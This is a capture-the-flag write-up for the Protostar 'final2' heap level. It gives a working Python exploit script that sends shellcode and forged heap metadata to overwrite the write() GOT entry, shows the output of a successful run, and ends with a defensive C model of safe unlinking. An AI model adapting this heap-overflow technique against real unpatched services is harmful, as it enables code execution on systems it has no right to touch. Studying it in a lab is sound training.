Exploit Exercises Protostar — final2

root@protostar:/home/user# cat final2.py
#!/usr/bin/python

# Standard heap-based buffer overflow exploited via heap metadata. Check out
# heap3 for more information.

import socket

HOST = "127.0.0.1"
PORT = 2993

s = socket.socket()
s.connect((HOST, PORT))

# First chunk is our shellcode holder and check_path() terminator
chunk1 = "FSRD"
chunk1 += "\xeb\x0c\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
chunk1 += "\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2"
chunk1 += "\x07\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\xe2\xff\xff\xff"
chunk1 += "\x70\x77\x6e\x65\x64\x21\x0a"
lim = 128-len(chunk1)-1
for i in range(lim):
    chunk1 += '1'
# '/' terminates the search from check_path()
chunk1 += '/'
print "[*] DEBUG: sizeof(chunk1): " + str(len(chunk1))

# Second chunk holds values which will overwrite heap metadata.
# Address of GOT entry for write() = 0x0804d41c
# Address of our own chunk1 = 0x0804e00c
chunk2 = "FSRDROOT/" + "\xfc\xff\xff\xff"*2 + "\x10\xd4\x04\x08" + "\x0c\xe0\x04\x08"
lim = 128-len(chunk2)-1
for i in range(lim):
    chunk2 += '2'
chunk2 += '\x00'
print "[*] DEBUG: sizeof(chunk2): " + str(len(chunk2))

# Additional chunk needs to be added to call write() function with our
# overwritten GOT entry
chunk3 = ""
lim = 128-len(chunk3)-1
for i in range(lim):
    chunk3 += '3'
chunk3 += '\x00'
print "[*] DEBUG: sizeof(chunk3): " + str(len(chunk3))

payload = chunk1 + chunk2 + chunk3
print "[+] Sending payload:\n" + payload + " (length = " + str(len(payload)) +")"
s.send(payload)
print s.recv(1024)
print s.recv(1024)

s.close()
root@protostar:/home/user# chmod +x final2.py
root@protostar:/home/user# ./final2.py
[*] DEBUG: sizeof(chunk1): 128
[*] DEBUG: sizeof(chunk2): 128
[*] DEBUG: sizeof(chunk3): 128
[+] Sending payload:
FSRD�
����������������1�1�1�1Ұ�Y�̀1�1۰̀�����pwned!
1111111111111111111111111111111111111111111111111111111111111111111/FSRDROOT/���������
�2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222223333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 (length = 384)
Process OK

pwned!

root@protostar:/home/user# ls /tmp/*
ls: cannot access /tmp/*: No such file or directory

The address of chunk1 will vary between environments, so this exploit has to be customised for the target; the comments in the script should shed some light on the matter.

The approach is the same as in final1.
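As an added defender-side example (my code, not part of this write-up or of Protostar), here is a small C model of the unlink operation this level abuses, placing the unchecked variant next to the safe-unlinking check glibc later introduced; the chunk struct, the decoy chunk and the demo functions are simplified constructions, not glibc's real code.

```c
#include <stddef.h>
#include <stdio.h>
/* Classic dlmalloc-style chunk layout that final2 corrupts (constructed model). */
typedef struct chunk {
    size_t prev_size, size;
    struct chunk *fd, *bk;
} chunk_t;

/* Legacy unlink: trusts fd/bk, so corrupted metadata becomes a write to FD->bk. */
static void unlink_legacy(chunk_t *p) {
    chunk_t *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}

/* Hardened unlink, mirroring glibc's "corrupted double-linked list" check:
 * both neighbours must still point back at P, else return -1 and write nothing. */
static int unlink_safe(chunk_t *p) {
    chunk_t *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -1;
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

/* Circular bin a<->b<->c: unlinking b must pass and leave a<->c. */
static int demo_valid(void) {
    chunk_t a = {0}, b = {0}, c = {0};
    a.fd = &b; b.bk = &a; b.fd = &c; c.bk = &b; a.bk = &c; c.fd = &a;
    if (unlink_safe(&b) != 0) return 0;
    return a.fd == &c && c.bk == &a;
}

/* Same bin, but b's fd/bk are overwritten to point at a decoy that never linked
 * to b. Returns 1 when the safe unlink refuses and the decoy stays untouched,
 * or (use_legacy) when the unchecked unlink silently writes into the decoy. */
static int demo_corrupted(int use_legacy) {
    chunk_t a = {0}, b = {0}, c = {0}, decoy = {0};
    a.fd = &b; b.bk = &a; b.fd = &c; c.bk = &b; a.bk = &c; c.fd = &a;
    b.fd = &decoy; b.bk = &decoy;            /* corrupted metadata */
    if (use_legacy) { unlink_legacy(&b); return decoy.bk == &decoy; }
    return unlink_safe(&b) == -1 && decoy.bk == NULL;
}

int main(void) {
    printf("valid=%d rejected=%d legacy_wrote=%d\n",
           demo_valid(), demo_corrupted(0), demo_corrupted(1));
    return 0;
}
```

Each demo function returns 1 when the behaviour described in its comment holds, so the run prints `valid=1 rejected=1 legacy_wrote=1`: the check costs two pointer comparisons and turns this class of metadata corruption into an abort instead of a write.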